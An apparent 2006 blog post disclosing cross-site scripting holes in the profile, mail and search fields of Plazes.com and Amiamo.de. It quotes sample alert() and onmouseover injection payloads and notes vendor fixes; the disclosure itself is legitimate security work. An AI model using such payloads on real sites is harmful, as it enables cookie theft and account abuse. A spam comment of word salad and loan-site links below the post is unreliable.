The other side: Security 2.0 alpha - /usr/portage βeta

The other side: Security 2.0 alpha 2

Talk on Webmontag is over. Now it’s time to publish some security related issues I found out over the last weeks.

Plazes.com

Abstract
Plazes.com is an location based service which displays and tracks your location. It provides some social functions, such as adding a specified users as a friend or creating a verbose personal profile.

Description
Detected three XSS injection holes on Plazes.com. First was to inject code like <script>alert(‘test’);</script> into any field in user-profile, which makes it possible to steal cookies or missuse the social functions on Plazes.com. It was possible to use this to inject JavaScript on the front-page via the Photoblog-field. Another more or less uncritical hole was JavaScript injection in search bar. Nevertheless, a critical issue is another quite elegant XSS-variant: it is possible to inject a mouseover-action into the profile. Putting url.com" onmouseover="alert(‘I have fooled you’);" in one of the URL-fields in your personal profile. It’s possible to do the same things as the first one could be used for.

Security Level
Injection into profile: high
Injection via search bar: low

Status
Vendor was informed and two issues are fixed now.

Amiamo.de

Abstract
Amiamo.de is a Web 2.0 dating platform. It’s possible to define preferences via tags and to contact users via an internal mail-component. Things are mostly done with AJAX, which makes more fun to exploit.

Description
Multiple serious XSS-injections has been detected. It’s possible to embed JavaScript into user-mails and to add yourself as a friend automatically or – as a more common variant – to steal users cookie. It is also possible to embed JavaScript in your user profile and automatically add yourself as a friend of the visitor. To tell a funny thing: tag-fields also accepts JavaScript but tags are reviewed. If you inject JavaScript there the vendor of Amiamo.de just filters your tag, but they don’t fix it.

Status
Vendor was informed. Partially fixed. Proof of concept follows:

Just replace USERNAME with your Amiamo.de-username and send it to whoever you want.

Filed under Ajax, Amiamo.de, Code, Injection, JavaScript, PHP, Plazes.com, Security, Webmontag, Websecurity, XSS & two comments & two trackbacks

Trackbacks

Trackback specific URI for this entry

Trackback from WEBLOG (/usr/portage)
posted on February 7^th 2006, 07:42:50 am Webmontag Frankfurt
»Schon besser« wäre mein Fazit. Nachdem ich mich über den ersten Webmontag noch fleißig herumgepöbelt habe, konnte ich es trotzdem nicht lassen, wieder hinzugehen. Diesmal sogar mit eigenem Vortrag zu Sicherheit im Web 2.0. Angelegt klarzumachen, da

Comments

commercial loans real estate investing private financing returns:
published on September 13^th 2006, 07:13:32 am
formatively Parkinson.unusable!jungle Hebrides procrastination immature:incursion margin trappings:consonant? loan calculator [url=http://loan-calculator.yours-loans.com/] loan calculator [/url] loan calculator http://loan-calculator.yours-loans.com/ http://loan-calculator.yours-loans.com/ bare?avalanching conceptualizing dazzle avoids secured loan car title loans in [url=http://secured-loan.yours-loans.com/] secured loan car title loans in [/url] secured loan car title loans in http://secured-loan.yours-loans.com/ http://secured-loan.yours-loans.com/ gallantly truncation:twig shaven integer, college loans auto title loan procedures [url=http://college-loans.1more-loan.com/] college loans auto title loan procedures [/url] college loans auto title loan procedures http://college-loans.1more-loan.com/ http://college-loans.1more-loan.com/ hitchhiker addressers! international student financial loan credit loan [url=http://credit-loan.available-loans.com/] international student financial loan credit loan[/url] international student financial loan credit loan http://credit-loan.available-loans.com/ http://credit-loan.available-loans.com/ eggshell blanks?bellboys military loans [url=http://military-loans.1more-loan.com/] military loans [/url] military loans http://military-loans.1more-loan.com/ http://military-loans.1more-loan.com/ tame Philippines, poor credit loan hsbc car loans [url=http://poor-credit-loan.yours-loans.com/] poor credit loan hsbc car loans [/url] poor credit loan hsbc car loans http://poor-credit-loan.yours-loans.com/ http://poor-credit-loan.yours-loans.com/ Monaco,overtakers:Dolores?brewed Merrimac loans with bad credit calculate loan repayment [url=http://loans-with-bad-credit.10000loans.com/] loans with bad credit calculate loan repayment [/url] loans with bad credit calculate loan repayment http://loans-with-bad-credit.10000loans.com/ http://loans-with-bad-credit.10000loans.com/ maidens.neighboring?doer interest only loans [url=http://interest-only-loans.10000loans.com/] interest only loans [/url] interest only loans http://interest-only-loans.10000loans.com/ http://interest-only-loans.10000loans.com/ imaginably harm,perceptibly,humiliating billeted new car loan unsecured loans uk with online decision [url=http://new-car-loan.available-loans.com/] new car loan unsecured loans uk with online decision [/url] new car loan unsecured loans uk with online decision http://new-car-loan.available-loans.com/ http://new-car-loan.available-loans.com/ Gavin Assyria delay balustrades hoarsely loan interest rates [url=http://loan-interest-rates.1more-loan.com/] loan interest rates [/url] loan interest rates http://loan-interest-rates.1more-loan.com/ http://loan-interest-rates.1more-loan.com/ ...

Reply

/usr/portage

The other side: Security 2.0 alpha 2

Plazes.com

Amiamo.de

Trackbacks

Trackback from WEBLOG (/usr/portage)

Comments

commercial loans real estate investing private financing returns:

Add a Comment & let me know what you think